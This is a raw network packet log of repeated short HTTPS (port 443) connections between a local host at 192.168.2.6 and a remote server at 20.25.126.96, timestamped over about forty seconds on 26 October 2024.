Oct 26, 2024 13:45:11.583508015 CEST	443	50092	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:11.583554029 CEST	50092	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:11.697849035 CEST	50093	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:11.697896957 CEST	443	50093	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:11.698124886 CEST	50093	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:11.698404074 CEST	50093	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:11.698429108 CEST	443	50093	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:12.989392996 CEST	443	50093	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:12.989545107 CEST	50093	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:12.989645004 CEST	50093	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:12.989661932 CEST	443	50093	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:12.990283012 CEST	50094	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:12.990322113 CEST	443	50094	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:12.990402937 CEST	50094	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:12.990657091 CEST	50094	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:12.990667105 CEST	443	50094	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:14.290241957 CEST	443	50094	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:14.290312052 CEST	50094	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:14.290498018 CEST	50094	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:14.290512085 CEST	443	50094	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:14.291198015 CEST	50095	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:14.291235924 CEST	443	50095	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:14.291299105 CEST	50095	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:14.291357040 CEST	50095	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:14.291409969 CEST	443	50095	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:14.291455030 CEST	50095	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:14.398822069 CEST	50096	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:14.398853064 CEST	443	50096	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:14.398945093 CEST	50096	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:14.399249077 CEST	50096	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:14.399266958 CEST	443	50096	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:15.686346054 CEST	443	50096	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:15.686450005 CEST	50096	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:15.686537981 CEST	50096	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:15.686553001 CEST	443	50096	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:15.687330008 CEST	50097	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:15.687377930 CEST	443	50097	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:15.687510967 CEST	50097	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:15.687782049 CEST	50097	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:15.687807083 CEST	443	50097	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:16.990191936 CEST	443	50097	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:16.990406990 CEST	50097	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:16.990641117 CEST	50097	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:16.990652084 CEST	443	50097	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:16.991195917 CEST	50098	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:16.991233110 CEST	443	50098	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:16.991327047 CEST	50098	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:16.991381884 CEST	50098	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:16.991413116 CEST	443	50098	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:16.991470098 CEST	50098	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:17.102070093 CEST	50099	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:17.102108955 CEST	443	50099	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:17.102221966 CEST	50099	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:17.102626085 CEST	50099	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:17.102641106 CEST	443	50099	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:18.378602982 CEST	443	50099	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:18.378696918 CEST	50099	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:18.378777981 CEST	50099	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:18.378796101 CEST	443	50099	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:18.379558086 CEST	50100	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:18.379604101 CEST	443	50100	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:18.379673004 CEST	50100	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:18.379966974 CEST	50100	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:18.379981995 CEST	443	50100	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:20.151910067 CEST	443	50100	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:20.152179003 CEST	50100	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:20.152179003 CEST	50100	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:20.152735949 CEST	50101	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:20.152781963 CEST	443	50101	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:20.152852058 CEST	50101	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:20.152901888 CEST	50101	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:20.152929068 CEST	443	50101	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:20.152976990 CEST	50101	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:20.260170937 CEST	50102	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:20.260212898 CEST	443	50102	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:20.260318995 CEST	50102	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:20.260653973 CEST	50102	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:20.260667086 CEST	443	50102	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:20.460545063 CEST	50100	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:20.460573912 CEST	443	50100	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:22.589318037 CEST	443	50102	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:22.589406013 CEST	50102	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:22.589709997 CEST	50102	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:22.589726925 CEST	443	50102	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:22.590415001 CEST	50103	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:22.590464115 CEST	443	50103	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:22.590542078 CEST	50103	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:22.590801954 CEST	50103	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:22.590816975 CEST	443	50103	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:23.887108088 CEST	443	50103	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:23.887279034 CEST	50103	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:23.887409925 CEST	50103	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:23.887429953 CEST	443	50103	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:23.888607979 CEST	50104	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:23.888706923 CEST	443	50104	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:23.888848066 CEST	50104	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:23.888964891 CEST	50104	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:23.889034033 CEST	443	50104	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:23.889118910 CEST	50104	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:23.992976904 CEST	50105	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:23.993032932 CEST	443	50105	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:23.993204117 CEST	50105	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:23.993530989 CEST	50105	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:23.993549109 CEST	443	50105	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:25.255173922 CEST	443	50105	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:25.255306959 CEST	50105	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:25.255563021 CEST	50105	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:25.255588055 CEST	443	50105	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:25.256436110 CEST	50106	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:25.256539106 CEST	443	50106	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:25.256655931 CEST	50106	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:25.256906033 CEST	50106	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:25.256943941 CEST	443	50106	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:26.554066896 CEST	443	50106	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:26.554373980 CEST	50106	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:26.554503918 CEST	50106	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:26.554547071 CEST	443	50106	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:26.555126905 CEST	50107	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:26.555150986 CEST	443	50107	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:26.555274010 CEST	50107	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:26.555583954 CEST	50107	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:26.555620909 CEST	443	50107	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:26.555706978 CEST	50107	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:26.665152073 CEST	50108	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:26.665211916 CEST	443	50108	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:26.665342093 CEST	50108	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:26.666001081 CEST	50108	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:26.666024923 CEST	443	50108	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:27.954082012 CEST	443	50108	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:27.954262018 CEST	50108	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:27.954377890 CEST	50108	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:27.954389095 CEST	443	50108	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:27.955161095 CEST	50109	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:27.955214977 CEST	443	50109	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:27.955329895 CEST	50109	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:27.955663919 CEST	50109	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:27.955691099 CEST	443	50109	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:29.221541882 CEST	443	50109	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:29.221683025 CEST	50109	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:29.221760988 CEST	50109	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:29.221779108 CEST	443	50109	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:29.222459078 CEST	50110	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:29.222486019 CEST	443	50110	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:29.222559929 CEST	50110	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:29.222661018 CEST	50110	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:29.222680092 CEST	443	50110	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:29.222729921 CEST	50110	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:29.338392019 CEST	50111	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:29.338426113 CEST	443	50111	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:29.338499069 CEST	50111	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:29.338843107 CEST	50111	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:29.338851929 CEST	443	50111	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:30.654664040 CEST	443	50111	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:30.654752016 CEST	50111	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:30.654841900 CEST	50111	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:30.654879093 CEST	443	50111	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:30.655510902 CEST	50112	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:30.655560017 CEST	443	50112	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:30.655643940 CEST	50112	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:30.655930042 CEST	50112	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:30.655958891 CEST	443	50112	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:31.968031883 CEST	443	50112	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:31.968164921 CEST	50112	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:31.989602089 CEST	50112	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:31.989655972 CEST	443	50112	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:31.990267038 CEST	50113	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:31.990304947 CEST	443	50113	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:31.990377903 CEST	50113	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:31.990428925 CEST	50113	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:31.990551949 CEST	443	50113	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:31.990602016 CEST	50113	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:32.108746052 CEST	50114	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:32.108820915 CEST	443	50114	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:32.108916044 CEST	50114	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:32.109379053 CEST	50114	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:32.109407902 CEST	443	50114	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:33.419755936 CEST	443	50114	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:33.419956923 CEST	50114	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:33.420182943 CEST	50114	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:33.420203924 CEST	443	50114	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:33.421010017 CEST	50115	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:33.421046972 CEST	443	50115	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:33.421186924 CEST	50115	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:33.421789885 CEST	50115	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:33.421798944 CEST	443	50115	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:34.703619003 CEST	443	50115	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:34.703737974 CEST	50115	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:34.703825951 CEST	50115	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:34.703844070 CEST	443	50115	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:34.704638958 CEST	50116	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:34.704700947 CEST	443	50116	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:34.704830885 CEST	50116	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:34.704991102 CEST	50116	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:34.705018044 CEST	443	50116	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:34.705092907 CEST	50116	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:34.823482990 CEST	50117	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:34.823539972 CEST	443	50117	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:34.823618889 CEST	50117	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:34.824244976 CEST	50117	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:34.824265003 CEST	443	50117	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:36.097172022 CEST	443	50117	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:36.097456932 CEST	50117	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:36.097501993 CEST	50117	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:36.097522020 CEST	443	50117	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:36.098120928 CEST	50118	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:36.098176003 CEST	443	50118	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:36.098284960 CEST	50118	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:36.098484039 CEST	50118	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:36.098499060 CEST	443	50118	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:37.408504009 CEST	443	50118	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:37.408642054 CEST	50118	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:37.408746958 CEST	50118	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:37.408760071 CEST	443	50118	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:37.409425020 CEST	50119	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:37.409485102 CEST	443	50119	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:37.409574986 CEST	50119	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:37.409682989 CEST	50119	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:37.409779072 CEST	443	50119	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:37.409826040 CEST	50119	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:37.525548935 CEST	50120	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:37.525588989 CEST	443	50120	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:37.525696993 CEST	50120	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:37.526073933 CEST	50120	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:37.526087999 CEST	443	50120	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:38.808084011 CEST	443	50120	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:38.808342934 CEST	50120	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:38.808495998 CEST	50120	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:38.808507919 CEST	443	50120	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:38.809276104 CEST	50121	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:38.809318066 CEST	443	50121	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:38.809474945 CEST	50121	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:38.809773922 CEST	50121	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:38.809789896 CEST	443	50121	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:40.224776030 CEST	443	50121	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:40.224874020 CEST	50121	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:40.224941015 CEST	50121	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:40.224958897 CEST	443	50121	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:40.225711107 CEST	50122	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:40.225785017 CEST	443	50122	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:40.225908041 CEST	50122	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:40.226070881 CEST	50122	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:40.226104975 CEST	443	50122	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:40.226167917 CEST	50122	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:40.336231947 CEST	50123	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:40.336260080 CEST	443	50123	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:40.336400032 CEST	50123	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:40.336736917 CEST	50123	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:40.336752892 CEST	443	50123	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:41.657072067 CEST	443	50123	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:41.657149076 CEST	50123	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:41.657222033 CEST	50123	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:41.657241106 CEST	443	50123	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:41.657819033 CEST	50124	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:41.657847881 CEST	443	50124	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:41.657913923 CEST	50124	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:41.658113003 CEST	50124	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:41.658126116 CEST	443	50124	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:42.953691959 CEST	443	50124	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:42.953808069 CEST	50124	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:42.953908920 CEST	50124	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:42.953933001 CEST	443	50124	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:42.954488993 CEST	50125	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:42.954524040 CEST	443	50125	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:42.954586983 CEST	50125	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:42.954649925 CEST	50125	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:42.954694033 CEST	443	50125	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:42.954731941 CEST	50125	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:43.070620060 CEST	50126	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:43.070661068 CEST	443	50126	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:43.070799112 CEST	50126	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:43.071098089 CEST	50126	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:43.071111917 CEST	443	50126	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:44.352809906 CEST	443	50126	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:44.352878094 CEST	50126	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:44.352952957 CEST	50126	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:44.352972031 CEST	443	50126	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:44.353538036 CEST	50128	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:44.353579998 CEST	443	50128	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:44.353650093 CEST	50128	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:44.353844881 CEST	50128	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:44.353863955 CEST	443	50128	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:45.658689022 CEST	443	50128	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:45.658858061 CEST	50128	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:45.658998013 CEST	50128	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:45.659022093 CEST	443	50128	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:45.659845114 CEST	50129	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:45.659885883 CEST	443	50129	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:45.659986973 CEST	50129	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:45.660064936 CEST	50129	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:45.660191059 CEST	443	50129	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:45.660244942 CEST	50129	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:45.775522947 CEST	50130	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:45.775578022 CEST	443	50130	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:45.775741100 CEST	50130	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:45.775928974 CEST	50130	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:45.775954962 CEST	443	50130	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:47.115437031 CEST	443	50130	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:47.115613937 CEST	50130	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:47.115714073 CEST	50130	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:47.115739107 CEST	443	50130	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:47.116627932 CEST	50131	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:47.116677046 CEST	443	50131	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:47.116801023 CEST	50131	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:47.117150068 CEST	50131	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:47.117167950 CEST	443	50131	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:48.407605886 CEST	443	50131	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:48.407711983 CEST	50131	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:48.407799959 CEST	50131	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:48.407816887 CEST	443	50131	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:48.408390999 CEST	50132	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:48.408431053 CEST	443	50132	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:48.408515930 CEST	50132	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:48.408559084 CEST	50132	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:48.408622980 CEST	443	50132	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:48.408665895 CEST	50132	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:48.523730040 CEST	50133	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:48.523780107 CEST	443	50133	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:48.523876905 CEST	50133	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:48.524130106 CEST	50133	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:48.524156094 CEST	443	50133	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:49.806425095 CEST	443	50133	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:49.806539059 CEST	50133	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:49.806678057 CEST	50133	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:49.806704044 CEST	443	50133	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:49.807399035 CEST	50134	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:49.807434082 CEST	443	50134	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:49.807512045 CEST	50134	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:49.807765961 CEST	50134	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:49.807779074 CEST	443	50134	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:51.099718094 CEST	443	50134	20.25.126.96	192.168.2.6
Oct 26, 2024 13:45:51.099880934 CEST	50134	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:51.100030899 CEST	50134	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:45:51.100054026 CEST	443	50134	20.25.126.96	192.168.2.6
